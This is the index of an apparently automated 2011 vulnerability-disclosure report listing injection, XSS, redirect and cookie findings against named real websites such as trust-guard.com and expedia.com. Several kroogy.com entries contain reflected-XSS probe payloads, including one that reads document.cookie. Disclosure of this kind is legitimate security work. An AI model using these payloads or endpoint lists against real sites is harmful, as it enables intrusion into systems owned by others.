XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05082011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 08:04:03 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. OS command injection

1.1. https://secure.trust-guard.com/ [__utmb cookie]

1.2. https://secure.trust-guard.com/ [__utmc cookie]

1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

1.4. https://secure.trust-guard.com/index.php [__utma cookie]

1.5. https://secure.trust-guard.com/index.php [__utmz cookie]

1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]

2. SQL injection

2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]

2.2. http://apps.sapha.com/appshandler.php [ac parameter]

2.3. http://dce.sapha.com/engine.php [ac parameter]

2.4. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

2.5. http://dce.sapha.com/logging.php [ac parameter]

2.6. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]

2.7. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]

2.8. http://poll.websitegear.com/compactpoll.asp [pollID parameter]

2.9. https://secure.trust-guard.com/ [__utmb cookie]

2.10. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]

2.11. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]

2.12. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]

2.13. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]

2.14. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

2.15. https://secure.trust-guard.com/index.php [__utmb cookie]

2.16. https://secure.trust-guard.com/index.php [__utmz cookie]

2.17. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]

2.18. https://subscribe.haymarketmedia.com/scm/ [form parameter]

2.19. http://tours.sapha.com/ [scs_sid parameter]

2.20. http://tours.sapha.com/ [scs_sid parameter]

2.21. http://tours.sapha.com/ [scs_tid parameter]

2.22. http://tours.sapha.com/ [scs_tid parameter]

2.23. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

2.24. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

2.25. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

2.26. http://www.caribbean-ocean.com/get-image.php [id parameter]

2.27. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

2.28. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

2.29. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

2.30. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]

2.31. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]

2.32. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

2.33. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]

2.34. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]

2.35. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]

2.36. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]

2.37. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]

2.38. http://www.expedia.com/pub/agent.dll [rged parameter]

2.39. http://www.expedia.com/pub/agent.dll [rgst parameter]

2.40. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]

2.41. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]

2.42. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]

2.43. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]

2.44. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]

2.45. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]

2.46. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]

2.47. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]

2.48. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

2.49. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

2.50. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]

2.51. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]

2.52. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

2.53. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

2.54. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]

2.55. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]

2.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

2.57. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

2.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

2.59. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

2.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

2.61. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

2.62. http://www.nutter.com/attorneys.php [AttorneyID parameter]

2.63. http://www.nutter.com/careers.php [CareerID parameter]

2.64. http://www.nutter.com/careers.php [CategoryID parameter]

2.65. http://www.socialfollow.com/button/image/ [b parameter]

3. LDAP injection

3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

4. HTTP header injection

4.1. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]

4.3. http://bidder.mathtag.com/iframe/notify [exch parameter]

4.4. http://d.xp1.ru4.com/activity [redirect parameter]

4.5. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://ad.adlegend.com/jscript [@CPSC@ parameter]

5.11. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

5.12. http://ad.adlegend.com/jscript [target parameter]

5.13. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [adurl parameter]

5.14. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [ai parameter]

5.15. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [client parameter]

5.16. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [num parameter]

5.17. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

5.18. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]

5.19. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

5.20. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]

5.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

5.22. http://adsfac.us/ag.asp [cc parameter]

5.23. http://apps.sapha.com/appshandler.php [ac parameter]

5.24. http://apps.sapha.com/appshandler.php [ac parameter]

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.26. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.27. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.28. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.29. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.30. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.31. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.32. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.33. http://bid.openx.net/json [c parameter]

5.34. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]

5.35. http://dce.sapha.com/engine.php [ac parameter]

5.36. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]

5.37. http://depot.activalive.com/app/deployment.php [d[] parameter]

5.38. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]

5.39. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]

5.40. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]

5.41. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]

5.42. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

5.43. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpck parameter]

5.44. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

5.45. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

5.46. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpck parameter]

5.47. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpvc parameter]

5.48. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpck parameter]

5.49. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpvc parameter]

5.50. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.51. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

5.52. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.53. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

5.54. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.55. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

5.56. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.57. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

5.58. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.59. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article [!category parameter]

5.60. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

5.61. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index [!category parameter]

5.62. http://iv.doubleclick.net/adj/nbcu.lim.har/news-local-article [!category parameter]

5.63. http://iv.doubleclick.net/adj/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

5.64. http://jlinks.industrybrains.com/jsct [ct parameter]

5.65. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.66. http://js.revsci.net/gateway/gw.js [csid parameter]

5.67. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.68. http://kroogy.com/a [REST URL parameter 1]

5.69. http://kroogy.com/favicon.ico [REST URL parameter 1]

5.70. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]

5.71. http://kroogy.com/pub/banner_728_90.php [REST URL parameter 1]

5.72. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

5.73. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a [REST URL parameter 1]

5.74. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]

5.75. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]

5.76. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 1]

5.77. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a [REST URL parameter 2]

5.78. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 1]

5.79. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E7fccbdccd2f/a [REST URL parameter 2]

5.80. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a [REST URL parameter 1]

5.81. http://learn.bridgefront.com/sendpassword [button1 parameter]

5.82. http://learn.bridgefront.com/sendpassword [button2 parameter]

5.83. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]

5.84. http://learn.bridgefront.com/sendpassword [forwardpage parameter]

5.85. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]

5.86. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]

5.87. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]

5.88. http://learn.bridgefront.com/sendpassword [totalvalues parameter]

5.89. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.90. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]

5.91. http://login.vindicosuite.com/default.asp [message parameter]

5.92. http://login.vindicosuite.com/default.asp [message parameter]

5.93. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.94. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

5.95. https://secure.trust-guard.com/index.php [txtEmail parameter]

5.96. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.97. http://store.kentuckyderby.com/cart.php [rs parameter]

5.98. https://subscribe.haymarketmedia.com/scm/ [form parameter]

5.99. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]

5.100. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

5.101. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]

5.102. http://tours.sapha.com/ [scs_sid parameter]

5.103. http://tours.sapha.com/ [scs_tid parameter]

5.104. https://verify.authorize.net/anetseal/ [rurl parameter]

5.105. http://widgets.digg.com/buttons/count [url parameter]

5.106. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]

5.107. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.108. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]

5.109. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

5.110. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]

5.111. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

5.112. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

5.113. http://www.caribbean-ocean.com/get-image.php [id parameter]

5.114. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

5.115. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

5.116. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

5.117. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]

5.118. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]

5.119. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.120. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]

5.121. http://www.expedia.com/pub/agent.dll [date1 parameter]

5.122. https://www.expedia.com/pub/agent.dll [selc parameter]

5.123. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]

5.124. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]

5.125. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]

5.126. http://www.ezflexplan.com/navigation/menu.asp [id parameter]

5.127. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders [name of an arbitrarily supplied request parameter]

5.128. http://www.horseracingnation.com/probables/probables.aspx [name of an arbitrarily supplied request parameter]

5.129. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.130. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]

5.131. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]

5.132. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.133. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.134. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]

5.135. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]

5.136. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

5.137. http://www.hunton.com/professionals/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.138. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.139. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]

5.140. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]

5.141. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]

5.142. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

5.143. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

5.144. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

5.145. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

5.146. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.147. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.148. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

5.149. http://www.nutter.com/attorneys.php [AttorneyID parameter]

5.150. http://www.nutter.com/careers.php [CareerID parameter]

5.151. http://www.nutter.com/careers.php [CategoryID parameter]

5.152. http://www.socialfollow.com/button/ [b parameter]

5.153. http://www.socialfollow.com/button/ [b parameter]

5.154. http://www.socialfollow.com/button/css/ [b parameter]

5.155. http://www.socialfollow.com/button/css/ [socialSites parameter]

5.156. http://www.socialfollow.com/login.php [tEmail parameter]

5.157. http://www.tagged.com/api/ [data parameter]

5.158. http://www.tagged.com/api/ [data parameter]

5.159. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]

5.160. http://www.twinspiresclub.com/members/join [REST URL parameter 2]

5.161. http://www.twinspiresclub.com/members/join [name of an arbitrarily supplied request parameter]

5.162. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.163. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]

5.164. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]

5.165. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.166. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.167. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.168. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.169. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.170. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.171. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.172. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.173. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.174. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.175. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.176. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.177. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]

5.178. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]

5.179. https://myaccount.nytimes.com/gst/forgot [RMID cookie]

5.180. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

5.181. http://support.expedia.com/app/answers/list/ [MC1 cookie]

5.182. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F [MC1 cookie]

5.183. http://www.expedia.com/default.asp [MC1 cookie]

6. Flash cross-domain policy

6.1. http://a.collective-media.net/crossdomain.xml

6.2. http://action.mathtag.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://adsfac.us/crossdomain.xml

6.5. http://altfarm.mediaplex.com/crossdomain.xml

6.6. http://api.facebook.com/crossdomain.xml

6.7. http://apps.sapha.com/crossdomain.xml

6.8. http://ar.voicefive.com/crossdomain.xml

6.9. http://as.casalemedia.com/crossdomain.xml

6.10. http://b.rad.msn.com/crossdomain.xml

6.11. http://b.voicefive.com/crossdomain.xml

6.12. http://bh.contextweb.com/crossdomain.xml

6.13. http://c.scout.com/crossdomain.xml

6.14. http://c5.zedo.com/crossdomain.xml

6.15. http://c7.zedo.com/crossdomain.xml

6.16. http://cdn.eyewonder.com/crossdomain.xml

6.17. http://cdn.gigya.com/crossdomain.xml

6.18. http://cu1.activalive.com/crossdomain.xml

6.19. http://d.xp1.ru4.com/crossdomain.xml

6.20. http://depot.activalive.com/crossdomain.xml

6.21. http://fls.doubleclick.net/crossdomain.xml

6.22. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

6.23. http://ib.adnxs.com/crossdomain.xml

6.24. http://img.mediaplex.com/crossdomain.xml

6.25. http://int.teracent.net/crossdomain.xml

6.26. http://m.adnxs.com/crossdomain.xml

6.27. http://media.fastclick.net/crossdomain.xml

6.28. http://microsoftsto.112.2o7.net/crossdomain.xml

6.29. http://nba.scout.com/crossdomain.xml

6.30. http://ne.wac.edgecastcdn.net/crossdomain.xml

6.31. http://now.eloqua.com/crossdomain.xml

6.32. http://om.expedia.com/crossdomain.xml

6.33. http://p.addthis.com/crossdomain.xml

6.34. http://pix04.revsci.net/crossdomain.xml

6.35. http://search.twitter.com/crossdomain.xml

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

6.37. http://segment-pixel.invitemedia.com/crossdomain.xml

6.38. http://tags.bluekai.com/crossdomain.xml

6.39. http://tours.sapha.com/crossdomain.xml

6.40. http://va.px.invitemedia.com/crossdomain.xml

6.41. http://www2.sesamestats.com/crossdomain.xml

6.42. http://edge.sharethis.com/crossdomain.xml

6.43. http://expedia.com/crossdomain.xml

6.44. http://googleads.g.doubleclick.net/crossdomain.xml

6.45. http://player.ooyala.com/crossdomain.xml

6.46. http://www.expedia.com/crossdomain.xml

6.47. https://www.expedia.com/crossdomain.xml

6.48. http://www.tagged.com/crossdomain.xml

6.49. http://extras.expedia.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.rad.msn.com/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://c.scout.com/clientaccesspolicy.xml

7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.6. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

7.7. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml

7.8. http://om.expedia.com/clientaccesspolicy.xml

7.9. http://player.ooyala.com/clientaccesspolicy.xml

7.10. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.11. http://www.gofileroom.com/clientaccesspolicy.xml

7.12. https://www.gofileroom.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://hmficweb.hinghammutual.com/reglogin.aspx

8.2. http://login.vindicosuite.com/

8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

8.4. http://login.vindicosuite.com/default.asp

8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp

8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html

8.7. http://www.eneighborhoods.com/login_form.asp

8.8. http://www.gofileroom.com/lbmc/

8.9. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders

8.10. http://www.horseracingnation.com/probables/probables.aspx

8.11. http://www.lbmc.com/user

8.12. http://www.nbcconnecticut.com/

8.13. http://www.nbcconnecticut.com/

8.14. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.15. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.16. http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html

8.17. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.18. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.19. http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html

8.20. http://www.resiteonline.com/

8.21. http://www.socialfollow.com/

8.22. http://www.socialfollow.com/

8.23. http://www.socialfollow.com/blog/

8.24. http://www.socialfollow.com/login.php

8.25. http://www.socialfollow.com/login.php

8.26. http://www.twinspiresclub.com/members/join

9. XML injection

9.1. http://api.facebook.com/restserver.php [format parameter]

9.2. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]

9.3. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]

9.4. http://www.expedia.com/pub/agent.dll [hfnm parameter]

9.5. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]

9.6. https://www.expedia.com/pub/agent.dll [JSESSION cookie]

9.7. https://www.expedia.com/pub/agent.dll [MC1 cookie]

9.8. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]

9.9. https://www.expedia.com/pub/agent.dll [aspp cookie]

9.10. https://www.expedia.com/pub/agent.dll [bn_u cookie]

9.11. https://www.expedia.com/pub/agent.dll [hfnm parameter]

9.12. https://www.expedia.com/pub/agent.dll [iEAPID cookie]

9.13. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]

9.14. https://www.expedia.com/pub/agent.dll [jscript cookie]

9.15. https://www.expedia.com/pub/agent.dll [p1 cookie]

9.16. https://www.expedia.com/pub/agent.dll [s1 cookie]

9.17. https://www.expedia.com/pub/agent.dll [s_sess cookie]

9.18. https://www.expedia.com/pub/agent.dll [s_vi cookie]

9.19. https://www.expedia.com/pub/agent.dll [srvys cookie]

10. Password returned in later response

10.1. http://www.socialfollow.com/

10.2. http://www.socialfollow.com/blog/

11. SQL statement in request parameter

11.1. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp

11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp

11.3. http://login.vindicosuite.com/default.asp

11.4. http://login.vindicosuite.com/vindico_dynamic.asp

11.5. https://secure.trust-guard.com/ResetPassword.php

11.6. https://secure.trust-guard.com/index.php

11.7. http://www.caribbean-ocean.com/get-image.php

11.8. http://www.socialfollow.com/button/image/

12. SSL cookie without secure flag set

12.1. https://broker.gotoassist.com/h/lbmc

12.2. https://secure.trust-guard.com/

12.3. https://secure.trust-guard.com/ResetPassword.php

12.4. https://secure.trust-guard.com/index.php

12.5. https://subscribe.haymarketmedia.com/scm/

12.6. https://www.taxnotebook.com/Login/PopupMessage.aspx

12.7. https://www.taxnotebook.com/Login/TNLogin.aspx

12.8. https://www.taxnotebook.com/tnstart.asp

12.9. https://meter-svc.nytimes.com/meter.js

12.10. https://www.expedia.com/pub/agent.dll

12.11. https://www.gofileroom.com/lbmc

13. Session token in URL

13.1. http://ads.adonion.com/serving/showbanner.php

13.2. http://bh.contextweb.com/bh/set.aspx

13.3. https://broker.gotoassist.com/ds/queryPost.flow

13.4. https://broker.gotoassist.com/javaScriptTester.tmpl

13.5. http://fls.doubleclick.net/activityi

13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr

13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr

13.8. http://l.sharethis.com/pview

13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

13.10. http://sales.liveperson.net/hc/56727252/

13.11. http://www.tagged.com/api/

14. ASP.NET ViewState without MAC enabled

14.1. http://nba.scout.com/

14.2. https://subscribe.haymarketmedia.com/scm/

14.3. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx

14.4. https://www.taxnotebook.com/Login/ChangePwd.aspx

14.5. https://www.taxnotebook.com/Login/PopupMessage.aspx

14.6. https://www.taxnotebook.com/Login/TNLogin.aspx

15. Open redirection

15.1. http://a.triggit.com/pxbk [redir parameter]

15.2. http://b.scorecardresearch.com/r [d.c parameter]

15.3. http://d.xp1.ru4.com/activity [redirect parameter]

